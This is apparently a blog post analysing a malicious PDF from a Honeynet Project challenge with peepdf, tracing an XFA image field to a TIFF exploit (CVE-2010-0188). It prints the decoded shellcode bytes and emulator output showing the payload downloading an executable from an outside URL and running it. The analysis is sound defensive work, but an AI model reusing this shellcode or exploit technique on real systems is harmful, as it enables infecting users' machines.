Analysing the Honeynet Project challenge PDF file with peepdf (II)

After the "useless" analysis of the fake objects now we can focus on the objects which will be parsed by the PDF reader:

/Catalog (27)
dictionary (28)
dictionary (22)
dictionary (23)
dictionary (22)
/Annot (24)
dictionary (23)
/Page (25)
/Pages (26)
/Page (25)
stream (21)
/Pages (26)

If we take a look at the Catalog object...

PPDF> object 27

<< /AcroForm 28 0 R
/MarkInfo << /Marked true >>
/Pages 26 0 R
/Type /Catalog
/Lang en-us
/PageMode /UseAttachments >>

There is no presence of any triggers here (/OpenAction) or in the rest of the objects (/AA) so it seems that the /AcroForm element has something to say. Also, the suspicious object 21 (/EmbeddedFile) is related with this interactive form:

PPDF> references to 21

[28]

PPDF> object 28

<< /DA /Helv 0 Tf 0 g
/Fields [ 22 0 R ]
/XFA [ template 21 0 R ] >>

In the dictionary of the form we can see that object 21 is a template and that there is a reference to a field object (object 22). So we continue analysing the field objects:

PPDF> object 22

<< /V
/T topmostSubform[0]
/Kids [ 23 0 R ] >>

PPDF> object 23

<< /Parent 22 0 R
/Kids [ 24 0 R ]
/T Page1[0] >>

PPDF> object 24

<< /Parent 23 0 R
/T ImageField1[0]
/Ff 65536
/MK << /TP 1
/IF << /A [ 0.0 1.0 ] >> >>
/F 4
/Rect [ 107.385 705.147 188.385 709.087 ]
/Type /Annot
/FT /Btn
/DA /CourierStd 10 Tf 0 g
/Subtype /Widget
/TU ImageField1
/P 25 0 R >>

We arrive to the last field element, called ImageField1, which has a suspicious value for its /Ff element, 65536...Now it's time to take a look at the content of this field in the template (object 21):

...
<field name="ImageField1" w="28.575mm" h="1.39mm" x="37.883mm" y="29.25mm">
<ui>
<imageEdit />
</ui>
</field>
<?templateDesigner expand 1?>
</subform>
<?templateDesigner expand 1?>
</subform>
<?templateDesigner FormTargetVersion 24?>
<?templateDesigner Rulers horizontal:1, vertical:1, guidelines:1, crosshairs:0?>
<?templateDesigner Zoom 94?>
</template>
<xfa:datasets xmlns:xfa="http://www.xfa.org/schema/xfa-data/1.0/">
<xfa:data>
<topmostSubform>
<ImageField1 xfa:contentType="image/tif" href="">SUkqADggAACQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk
JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJ
CQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJ
...

Mmm...we have a TIFF image, CVE-2010-0188? The content is encoded with base64 so we put it in a variable and we decode it:

PPDF> set sh "SUkqADggAACQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJ
CQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJ..."
PPDF> set output variable raw_sh
PPDF> decode variable sh b64

49 49 2a 00 38 20 00 00 90 90 90 90 90 90 90 90 |II*.8 ..........|
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
...
90 90 90 90 90 90 90 90 90 90 90 90 90 31 c9 dd |.............1..|
c5 b8 53 2c 18 36 d9 74 24 f4 5f b1 66 31 47 18 |..S,.6.t$._.f1G.|
83 c7 04 03 47 14 e2 a6 c7 08 6c 02 2b e0 f6 2b |....G.....l.+..+|
77 f3 76 7f 82 6a 94 85 79 89 b1 92 81 6d be 14 |w.v.j..y....m..|
32 0b d8 4d 09 d6 e3 c4 17 b0 8d 04 f1 56 bf c1 |2..M.........V..|
84 6d d2 c8 16 9f 93 f8 f2 05 01 11 85 a7 bc 83 |.m..............|
98 c0 78 c9 ff 1c ac 60 55 54 9d b4 62 87 87 d2 |..x....`UT..b...|
11 ba ac 11 42 7a 58 ea 80 ea 5d d2 41 53 c3 06 |....BzX...].AS..|
0e 1b 3b 70 36 c9 ef 6e 66 53 95 d4 d0 d4 30 b0 |..;p6..nfS....0.|
4a 74 ba 52 1a 67 9b d7 86 d2 7b af 2d 78 23 5d |Jt.R.g....{.-x#]|
cb e7 8e 73 88 05 41 69 11 bd 8f c4 5e 5c 6f a7 |...s..Ai....^\o.|
69 c6 e9 de 70 a6 9d 2b 4b 3e 50 ce 97 ad 2d e3 |i...p..+K>P...-.|
80 12 dc a7 28 0b 86 bd 15 a6 76 1e b0 11 91 4c |....(.....v....L|
a0 44 0d 95 e0 6d 24 1c fc d4 35 e7 cb b1 77 62 |.D...m$...5...wb|
92 a0 12 49 d2 6c de 0f fe 09 82 4e fc b7 24 3a |...I.l.....N..$:|
a4 0e 9f f0 98 58 46 ca 42 49 c2 1b 46 0b 02 f2 |.....XF.BI..F...|
9e b2 54 69 8b 62 5c 6d 92 78 fe 45 ef 4e 35 33 |..Ti.b\m.x.E.N53|
bb 93 0a 89 40 63 21 b4 ec fa 8a 20 77 9b 2a 50 |....@c!.... w.*P|
9a aa 38 5e 9f f5 42 63 8b fa 57 71 d5 dd 54 68 |..8^..Bc..Wq..Th|
2c 01 4e 9f 4d 36 52 af 45 4b 97 a2 6c 5f 88 e4 |,.N.M6R.EK..l_..|
08 6e b9 e3 f7 8e c6 f1 91 8d d6 f5 4f e0 e8 1e |.n..........O...|
73 03 f7 79 59 02 f0 84 b7 1b fa 9d c0 37 1d b9 |s..yY........7..|
a8 24 35 cc 3f 42 3d b7 0c 60 17 1a 7a 99 6f 51 |.$5.?B=..`..z.oQ|
75 9e 6d 54 8c 80 7e 93 8d e7 e6 33 1a 6c 69 f9 |u.mT..~....3.li.|
cd a3 eb 91 7e db c5 01 ee 4d 7f a8 9e f4 0b 64 |....~....M....d|
30 85 94 56 a3 10 74 c0 54 91 ef 62 d8 3c 93 25 |0..V..t.T..b.<.%|
7d d7 32 b5 ed 42 db 22 8b a3 57 c4 36 e3 e5 71 |}.2..B."..W.6..q|
d8 77 55 14 7b e4 1e 87 09 91 ce 22 96 3c 8f 90   |.wU.{......".<..|
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   |................|

PPDF> reset output

Now we have the raw content in a variable and we are going to emulate the execution with the sctest wrapper:

PPDF> sctest variable raw_sh

verbose = 0
Hook me Captain Cook!
userhooks.c:127 user_hook_ExitThread
ExitThread(32)
stepcount 9172
FARPROC WINAPI GetProcAddress (
HMODULE hModule = 0x7c800000 =>
none;
LPCSTR lpProcName = 0x0041767d =>
           = "GetSystemDirectoryA";
) = 0x7c814eea;
FARPROC WINAPI GetProcAddress (
     HMODULE hModule = 0x7c800000 =>
         none;
     LPCSTR lpProcName = 0x00417691 =>
           = "WinExec";
) = 0x7c86136d;
FARPROC WINAPI GetProcAddress (
     HMODULE hModule = 0x7c800000 =>
         none;
     LPCSTR lpProcName = 0x00417699 =>
           = "ExitThread";
) = 0x7c80c058;
FARPROC WINAPI GetProcAddress (
     HMODULE hModule = 0x7c800000 =>
         none;
     LPCSTR lpProcName = 0x004176a4 =>
           = "LoadLibraryA";
) = 0x7c801d77;
HMODULE LoadLibraryA (
     LPCTSTR lpFileName = 0x004176b1 =>
           = "urlmon";
) = 0x7df20000;
FARPROC WINAPI GetProcAddress (
     HMODULE hModule = 0x7df20000 =>
         none;
     LPCSTR lpProcName = 0x004176b8 =>
           = "URLDownloadToFileA";
) = 0x7df7b0bb;
UINT GetSystemDirectory (
     LPTSTR lpBuffer = 0x0012fe7c =>
         none;
     UINT uSize = 32;
) =  19;
HRESULT URLDownloadToFile (
     LPUNKNOWN pCaller = 0x00000000 =>
         none;
     LPCTSTR szURL = 0x004176cb =>
           = "http://blog.honeynet.org.my/forensic_challenge/the_real_malware.exe";
     LPCTSTR szFileName = 0x0012fe7c =>
           = "c:\WINDOWS\system32\a.exe";
     DWORD dwReserved = 0;
     LPBINDSTATUSCALLBACK lpfnCB = 0;
) =  0;
UINT WINAPI WinExec (
     LPCSTR lpCmdLine = 0x0012fe7c =>
           = "c:\WINDOWS\system32\a.exe";
     UINT uCmdShow = 0;
) =  32;
void ExitThread (
     DWORD dwExitCode = 32;
) =  0;

Done! Finally we have the trigger and the executed payload of the malicious PDF file! This shellcode also tries to download a binary and execute it, but this time the URL is the real one :)

 

Analysing the Honeynet Project challenge PDF file with peepdf (I)

hey, hope you enjoyed the

hey, hope you enjoyed the challenge. :). it was designed to be fun.btw, it's interesting enough to see many submitter got confused with /Root. :).

Yeah!

Yeah! I really enjoyed it, it was interesting to see that behaviour :) Good work! ;)

Post new comment

The content of this field is kept private and will not be shown publicly.
  • Web page addresses and e-mail addresses turn into links automatically.
  • Allowed HTML tags: <a> <em> <strong> <cite> <code> <ul> <ol> <li> <dl> <dt> <dd>
  • Lines and paragraphs break automatically.

More information about formatting options

Type the characters you see in this picture. (verify using audio)
Type the characters you see in the picture above; if you can't read them, submit the form and a new image will be generated. Not case sensitive.